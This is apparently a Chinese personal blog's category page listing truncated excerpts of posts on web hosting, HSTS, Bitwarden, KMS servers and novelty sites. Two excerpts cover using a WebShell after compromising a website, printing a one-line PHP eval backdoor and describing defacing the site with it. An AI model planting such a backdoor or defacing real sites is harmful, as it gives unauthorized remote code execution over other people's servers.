分类:

21 篇文章

做了个网抑云在线语录
最近正好流行网抑云文化,就想到做个API网址https://nd.2890.ltd/API地址在https://nd.2890.ltd/api/用法只用传入format参数https://nd.2890.ltd/api/?format=format有如下参数:js:返回一段js代码,可以直接使用<p id="hitokoto&quo…
看到个神奇的网站
这是一个网站,它的介绍中宣称它可以读到人们内心正在想的事物(通过回答问题)[button href="https://cn.akinator.com/"]传送门[/button]实践刚开始我是不信的,直到我点开了这个网站,想了个亚总,开始了第13道题的时候,他已经猜中了!为了确保准确性,咱想个冷门点的人 B站传送门因为这位唱见比较冷(bushi)所…
沙雕博主对沙雕域名的执着
一早起来朋友扔给我个白嫖域名链接,没嫖到不说还搜了几节课域名#(喜极而泣)以下域名就是图个乐,大部分都溢价或者没有了awsl是American wrestling superstars live 美国全明星摔跤大赛直播的缩写 因为b站人均摔跤大师 如果一个人跟你说awsl 意思是他想跟你摔跤@(滑稽)Amazon Web Service Lite不…
10分钟,0经费让你的网站告别黑洞
做网站,被打已经是家常便饭了,可是每次被打,无防的阿里云、腾讯云的最低级的VPS一碰就死,几乎没有挣扎的余地,但是我们可以通过GitHub、Coding等等HTML托管服务(Pages服务)来让你的网站有一个全量镜像。成品效果感谢夜杏提供HTML单页[hide][btn url="https://mir.2890.ltd"]我的镜像传送门[/btn…
如何给自己的网站添加HSTS
什么是HSTSHSTS("HTTP Strict Transport Security” HTTP严格安全传输)是一种响应头,像这样Strict-Transport-Security: max-age=31536000; includeSubDomains; preload;他可以防止你的网站在第一次http请求中被劫持,导致无法正常访问。本来我想…
如何优雅的使用你的WebShell II
上篇文章我们介绍了我推荐的WebShell,这篇我们来说说如何通过这个WebShell干一些其他事,这篇文章里我就不说访问啥了,直接放代码1.使用后门获取目录信息这个不多说,有PHP基础的应该都会用$dir = dirname(__FILE__);$file = scandir($dir);echo " <pre>"…
如何优雅的给GetShell后的网站挂黑提醒
个人推荐webshell<?php @eval($_GET["cmd"]); ?>死稳的一句话,也是个基础WebShell,但是适用于宝塔之类的禁用了系统函数的环境,后面我会进行演示。当你通过自己的方法把这个shell上传了上去之后,不用菜刀,所有操作均在浏览器进行,(这个WebShell的操作全部为php代码,宝塔…
挖坑埋密码?密码存贮程序Bitwarden初体验
这是一款开源的密码服务器,在密码学中有一个原则,只要你的密钥没有被泄露,那么你的数据就是安全的,无论过程是否众所周知。安装体验官方BitWarden是基于.Net 部署,使用MSSQL过于臃肿,于是我并没有使用官方版本,去年在社区中有几位朋友使用Rust将他重写了,项目名为BitWarden_rs,使用SQLite作为数据库,提供Docker部署方…
0成本搭建超快的Serverless Blog
用过很多博客程序了,有动态的,也有静态的,只能说各有所长吧。今天这个程序,基于serverless,运行在cloudflare workers上,除了域名需要付费(也可以去Freenom申请免费的,但是不推荐)其余都是完全免费的。演示源代码github 这份代码是未经修改的,你也可以选择自行修改搭建过程进入cloudflare官网,登录你的账号进入…
自建KMS激活服务器:如何用CentOS安装KMS
或许大家都用过网上或者购买过光盘那些坑爹的Ghost盗版系统,内置各种辣鸡、流氓软件,新系统?纯净版Ghost系统?不存在的~所以,今天我们就来搭建windows kms服务器前言Key Management Service(简称:KMS),这个功能是在Windows Vista之后的产品中的一种新型产品激活机制。我们可以利用手里闲置的VPS安装v…